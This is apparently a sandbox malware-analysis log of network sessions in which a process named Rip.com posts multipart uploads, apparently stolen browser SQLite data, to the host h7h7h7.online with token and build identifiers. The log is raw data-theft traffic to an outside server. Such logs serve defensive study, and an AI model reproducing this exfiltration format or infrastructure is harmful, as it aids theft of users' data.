                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:30 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                              Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                              2024-12-31 20:40:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:31 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              18192.168.2.449773116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:31 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----kf37qimymo89rie3wbim
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 66001
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:31 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6b 66 33 37 71 69 6d 79 6d 6f 38 39 72 69 65 33 77 62 69 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 6b 66 33 37 71 69 6d 79 6d 6f 38 39 72 69 65 33 77 62 69 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6b 66 33 37 71 69 6d 79 6d 6f 38 39 72 69 65 33 77 62 69 6d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------kf37qimymo89rie3wbimContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------kf37qimymo89rie3wbimContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------kf37qimymo89rie3wbimCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:31 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              19192.168.2.449774116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:32 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----pzukxlf37g4ozmyusjeu
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 153381
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 70 7a 75 6b 78 6c 66 33 37 67 34 6f 7a 6d 79 75 73 6a 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 70 7a 75 6b 78 6c 66 33 37 67 34 6f 7a 6d 79 75 73 6a 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 70 7a 75 6b 78 6c 66 33 37 67 34 6f 7a 6d 79 75 73 6a 65 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------pzukxlf37g4ozmyusjeuContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------pzukxlf37g4ozmyusjeuContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------pzukxlf37g4ozmyusjeuCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
